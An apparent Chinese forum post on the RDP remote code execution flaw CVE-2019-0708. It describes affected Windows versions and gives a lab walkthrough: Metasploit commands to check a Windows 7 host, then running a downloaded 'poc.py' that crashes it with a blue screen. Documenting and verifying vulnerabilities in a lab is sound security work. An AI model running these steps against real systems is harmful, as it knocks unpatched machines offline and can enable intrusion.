本帖最后由 adds 于 2024-6-26 20:03 编辑
1、漏洞概述 Microsoft RDP 远程代码执行(CVE-2019-0708)是一个严重的安全漏洞。2019年5月15日由微软发布安全公告。该漏洞影响Windows系列服务器和操作系统,包括Windows 2003、Windows 2008、Windows 2008 R2、Windows XP等。
2、漏洞描述 2.1 攻击方式:利用远程桌面协议(RDP)通过远程桌面端口3389进行攻击。 2.2 利用方式:当未经身份验证的攻击者使用RDP连接到目标系统并发送特殊设计的请求时,远程桌面服务(以前称为终端服务)中存在远程代码执行漏洞。 2.3 影响:成功利用此漏洞的攻击者可以在目标系统上执行任意代码,安装程序,查看、更改或删除数据,或创建具有完全用户权限的新帐户。
3、漏洞验证 3.1 漏洞环境 目标主机:win7系统。IP为192.168.56.137。 验证主机:kali系统。IP为192.168.56.134。 3.2 执行命令 msfconsole //进入metasploit环境 search 0708 //搜索0708漏洞 use 0 //使用第1个验证 set rhost 192.168.56.137 //设置目标主机 run //执行 当出现“The target is vulnerable. ”表示服务器存在该漏洞。
4、漏洞利用 4.1 下载EXP 4.2 上传到kali主机 4.3 执行利用命令 python3 poc.py 192.168.56.137 4.4 观察服务器状态 已经蓝屏,无法对外提供服务。
|